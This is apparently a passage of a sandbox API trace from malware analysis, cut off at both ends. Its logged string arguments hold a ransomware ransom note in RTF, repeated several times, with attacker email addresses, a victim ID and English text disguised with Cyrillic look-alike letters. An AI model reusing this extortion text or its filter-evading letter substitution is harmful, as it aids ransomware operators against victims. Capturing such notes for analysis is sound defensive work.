y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w 